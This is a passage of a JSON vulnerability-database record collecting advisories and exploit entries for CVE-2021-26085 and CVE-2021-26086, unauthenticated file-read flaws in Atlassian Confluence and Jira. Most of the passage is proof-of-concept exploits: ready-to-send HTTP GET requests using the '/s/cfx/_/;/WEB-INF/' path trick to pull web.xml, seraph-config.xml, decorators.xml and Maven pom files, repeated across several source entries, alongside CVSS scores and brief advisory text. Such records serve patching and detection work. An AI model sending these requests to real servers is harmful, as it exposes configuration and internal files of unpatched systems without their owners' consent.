\nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \nPOC File #2 - seraph-config.xml \n \nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #3 - decorators.xml \n \nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \nPOC File #4 - /jira-webapp-dist/pom.properties \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #5 - /jira-webapp-dist/pom.xml \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #6 - /atlassian-jira-webapp/pom.xml \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #7 - /atlassian-jira-webapp/pom.properties \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164405/ajsdc840-fileread.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-05T15:03:36", "description": "", "cvss3": {}, "published": "2021-10-05T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Server 7.5.1 Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-05T00:00:00", "id": "PACKETSTORM:164401", "href": "https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html", "sourceData": "`# Exploit Title: Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability \n# Date: 2021-10-05 \n# Exploit Author: Mayank Deshmukh \n# Author email: coldfusionx@outlook.com \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.5.0 versions before 7.12.3 \n# Tested on: Kali Linux & Windows 10 \n# CVE : CVE-2021-26085 \n \nPOC #1 - web.xml \n \nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #2 - seraph-config.xml \n \nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #3 - pom.properties \n \nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #4 - pom.xml \n \nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164401/acs751-fileread.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-04-28T02:33:37", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-07-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-26085", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-08-12T00:00:00", "id": "AKB:86E277EE-5AAD-4CB9-B3E0-74F63338074C", "href": "https://attackerkb.com/topics/mZkkGESb1c/cve-2021-26085", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "File disclosure vulnerability in Confluence\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-07T00:00:00", "type": "dsquare", "title": "Confluence < 7.12.3 File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-09-07T00:00:00", "id": "E-737", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-06-22T16:54:07", "description": "An arbitrary file read vulnerability exists in Atlassian Confluence Server. Successful exploitation of this vulnerability could allow an unauthenticated remote attacker to access and read arbitrary file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-02-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Server Arbitrary File Read (CVE-2021-26085)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-22T00:00:00", "id": "CPAI-2021-1063", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:28:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-06T00:00:00", "type": "exploitdb", "title": "Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086", "2021-26086"], "modified": "2021-10-06T00:00:00", "id": "EDB-ID:50380", "href": "https://www.exploit-db.com/exploits/50380", "sourceData": "# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read\r\n# Date: 2021-10-05\r\n# Exploit Author: Mayank Deshmukh\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/jira/download/data-center\r\n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1\r\n# Tested on: Kali Linux & Windows 10\r\n# CVE : CVE-2021-26086\r\n\r\nPOC File #1 - web.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n\r\nPOC File #2 - seraph-config.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #3 - decorators.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n\r\nPOC File #4 - /jira-webapp-dist/pom.properties\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #5 - /jira-webapp-dist/pom.xml\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #6 - /atlassian-jira-webapp/pom.xml\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #7 - /atlassian-jira-webapp/pom.properties\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close", "sourceHref": "https://www.exploit-db.com/download/50380", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-13T05:28:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "2021-26085"], "modified": "2021-10-05T00:00:00", "id": "EDB-ID:50377", "href": "https://www.exploit-db.com/exploits/50377", "sourceData": "# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read\r\n# Date: 2021-10-05\r\n# Exploit Author: Mayank Deshmukh\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: version < 7.4.10 and 7.5.0 \u2264 version < 7.12.3\r\n# Tested on: Kali Linux & Windows 10\r\n# CVE : CVE-2021-26085\r\n\r\nPOC #1 - web.xml\r\n\r\nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #2 - seraph-config.xml\r\n\r\nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #3 - pom.properties\r\n\r\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #4 - pom.xml\r\n\r\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close", "sourceHref": "https://www.exploit-db.com/download/50377", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
